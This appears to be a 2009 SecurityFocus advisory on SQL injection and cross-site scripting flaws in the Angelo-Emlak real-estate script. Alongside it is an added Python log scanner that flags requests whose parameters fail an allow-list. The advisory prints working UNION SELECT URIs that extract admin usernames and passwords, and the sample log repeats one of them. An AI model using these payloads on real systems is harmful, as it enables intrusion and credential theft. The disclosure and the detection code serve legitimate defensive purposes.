
Angelo-Emlak Multiple SQL Injection and Cross-Site Scripting Vulnerabilities

An attacker can exploit these issues through a browser. To exploit the cross-site scripting issue, the attacker must entice an unsuspecting user to follow a malicious URI.

The following example URIs are available:

http://www.example.com:2222/lab/angelo-emlak_v1.0/hpz/admin/Default.asp?sayfa=[XSS]

http://www.example.com:2222/lab/angelo-emlak_v1.0/hpz/profil.asp?id=1+union+select+0,1,2,3,(user),(pass),1,1,1,1,1,1,1,1,1,1,1,1,1,1+from+admin+where+id=1

http://www.example.com:2222/lab/angelo-emlak_v1.0/hpz/prodetail.asp?id=1+union+select+user,0,2,3,4,5,6,7,8,9,null,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1+from+admin

http://www.example.com:2222/lab/angelo-emlak_v1.0/hpz/prodetail.asp?id=1+union+select+pass,0,2,3,4,5,6,7,8,9,null,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1+from+admin
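For defenders reviewing web server logs, the following added example (not part of the original advisory or the Angelo-Emlak code) flags requests to the three scripts above whose `id` or `sayfa` value fails a strict allow-list. It assumes `id` is meant to be an integer and `sayfa` a simple page token, and it uses a constructed, simplified log format.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Script -> (parameter, allow-list) for the three pages in the advisory's URIs.
# Assumption: "id" is a plain integer and "sayfa" a simple page token.
RULES = {
    "profil.asp": ("id", re.compile(r"\d+")),
    "prodetail.asp": ("id", re.compile(r"\d+")),
    "default.asp": ("sayfa", re.compile(r"[\w.-]*")),
}

def check_request(uri):
    """Return (parameter, decoded value) pairs that fail the allow-list."""
    parts = urlsplit(uri)
    script = parts.path.rsplit("/", 1)[-1].lower()
    if script not in RULES:
        return []
    name, allowed = RULES[script]
    # parse_qs decodes %XX and turns '+' into a space before matching.
    values = parse_qs(parts.query, keep_blank_values=True).get(name, [])
    return [(name, v) for v in values if not allowed.fullmatch(v)]

def scan_log(lines):
    """Return (client, uri, findings) for every flagged log line."""
    hits = []
    for line in lines:
        fields = line.split()
        if len(fields) < 3:
            continue  # not a request line in the assumed format
        findings = check_request(fields[2])
        if findings:
            hits.append((fields[0], fields[2], findings))
    return hits

# Constructed sample log, simplified to "client method uri status".
SAMPLE_LOG = [
    "198.51.100.7 GET /hpz/profil.asp?id=12 200",
    "198.51.100.7 GET /hpz/profil.asp?id=1+union+select+0,1,2+from+admin 200",
    "203.0.113.9 GET /hpz/admin/Default.asp?sayfa=%3Cb%3Etest 200",
    "203.0.113.9 GET /hpz/admin/Default.asp?sayfa=ayarlar 200",
    "203.0.113.9 GET /hpz/index.asp?id=abc 200",
]

if __name__ == "__main__":
    for client, uri, findings in scan_log(SAMPLE_LOG):
        print(client, uri, findings)
```

The same allow-list, applied server-side before the value reaches the query or the response, is the corresponding input-validation control; it complements parameterized queries and output encoding rather than replacing them.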

Copyright 2009, SecurityFocus